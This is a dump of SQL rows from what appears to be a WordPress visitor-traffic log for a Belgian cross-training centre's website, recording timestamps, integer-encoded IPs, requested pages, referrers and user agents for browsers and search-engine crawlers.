(74239, 1496331298.371345, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74240, 1496331298.947284, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74241, 1496331299.376880, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74242, 1496331299.825984, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74243, 1496333755.841886, 3657085691, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74244, 1496335661.508007, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(74245, 1496335662.089658, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74246, 1496335662.603230, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74247, 1496335663.016947, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74248, 1496335663.528085, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74249, 1496335663.935361, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74250, 1496335664.346238, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74251, 1496335664.805646, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74252, 1496335665.226917, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74253, 1496335665.620154, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74254, 1496335666.017031, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74255, 1496335666.493166, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74256, 1496335666.911303, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74257, 1496335667.321200, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74258, 1496336285.758184, 3657085691, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74259, 1496339555.552078, 3657085691, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74260, 1496340552.831224, 2499535434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(74261, 1496341294.632328, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74262, 1496341295.221094, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74263, 1496341295.713174, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74264, 1496341296.234670, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74265, 1496341296.754246, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74266, 1496341297.186058, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74267, 1496341297.785230, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74268, 1496341298.366509, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74269, 1496341298.824215, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74270, 1496341299.271417, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74271, 1496341299.706369, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74272, 1496341736.628886, 3024883611, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(74273, 1496342082.770575, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74274, 1496342083.238337, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74275, 1496342083.683014, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74276, 1496342084.171726, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74277, 1496342084.583084, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74278, 1496342085.047901, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74279, 1496342085.629413, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74280, 1496342086.225669, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74281, 1496342086.750486, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74282, 1496342087.247175, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74283, 1496342087.674651, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74284, 1496342120.432089, 1374839056, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(74285, 1496342129.124368, 1374839056, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(74286, 1496342135.030683, 1374839056, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(74287, 1496342137.647681, 1374839056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(74288, 1496342157.213381, 1374839056, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(74289, 1496342164.757448, 1374839056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(74290, 1496342171.415370, 1374839056, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(74291, 1496342173.282192, 1374839056, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(74292, 1496342179.683441, 1374839056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(74293, 1496342185.843497, 1374839056, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(74294, 1496342217.489331, 1374839056, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(74295, 1496342220.735457, 1374839056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),
(74296, 1496344485.433135, 3657085691, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74297, 1496345737.805853, 3024883471, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(74298, 1496353117.973113, 3657085691, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74299, 1496362344.992711, 2637637526, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74300, 1496364555.516522, 1123635012, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74301, 1496364556.050675, 1123635012, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74302, 1496366218.625785, 1123635012, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74303, 1496367800.772149, 1123635012, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74304, 1496369178.498738, 1123635012, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74305, 1496370578.888806, 1123635012, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74306, 1496371806.370423, 1123635012, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74307, 1496373055.104271, 1123635012, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74308, 1496374226.767774, 1123635012, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74309, 1496375411.900481, 1123635012, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74310, 1496376672.512134, 2637637583, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74311, 1496380823.654780, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74312, 1496380824.209653, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74313, 1496380824.662900, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74314, 1496380825.213670, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74315, 1496380825.713313, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74316, 1496380826.237904, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74317, 1496380826.815908, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74318, 1496380827.370126, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74319, 1496380827.816082, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74320, 1496380828.255861, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74321, 1496380828.781160, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74322, 1496383217.124200, 1538614733, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G928F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(74323, 1496383218.897503, 1538614733, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G928F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(74324, 1496388826.043017, 3342489299, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(74325, 1496388886.630753, 3342489299, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(74326, 1496389748.277283, 3242976508, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjk6vOZ1p7UAhXMKVAKHQPJCaMQFggjMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74327, 1496390166.395750, 2995852746, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G928F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(74328, 1496391682.954116, 1771904328, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74329, 1496391719.579382, 1771904328, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74330, 1496391719.583405, 1771904328, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74331, 1496391732.545888, 1771904328, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74332, 1496391736.852235, 1771904328, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74333, 1496391796.762888, 1771904328, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74334, 1496394610.346895, 783487407, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74335, 1496394611.135740, 783487407, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74336, 1496394611.611915, 783487407, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74337, 1496394612.139324, 783487407, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74338, 1496394612.684320, 783487407, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74339, 1496394613.185174, 783487407, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74340, 1496394613.806560, 783487407, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74341, 1496394614.257784, 783487407, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74342, 1496394614.716693, 783487407, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74343, 1496394615.159461, 783487407, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74344, 1496394615.677256, 783487407, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74345, 1496396102.406435, 1538773687, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-G850F Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(74346, 1496396104.011549, 1538773687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-G850F Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(74347, 1496396113.887104, 1538773687, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-G850F Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(74348, 1496405550.853527, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74349, 1496405551.587431, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74350, 1496407772.246001, 1842251139, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-pols.php', 'http://crosstrainingcenter.be/wp-pols.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(74351, 1496424346.065614, 2637637583, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74352, 1496424855.809452, 1053976392, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(74353, 1496425009.660802, 621375751, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74354, 1496425015.814802, 2996488251, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74355, 1496427888.438244, 2509960045, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(74356, 1496430820.804999, 2745959577, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(74357, 1496431436.040116, 2493742914, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50'),
(74358, 1496431437.051588, 2493742914, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50'),
(74359, 1496431438.209175, 2493742914, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50'),
(74360, 1496433927.618232, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
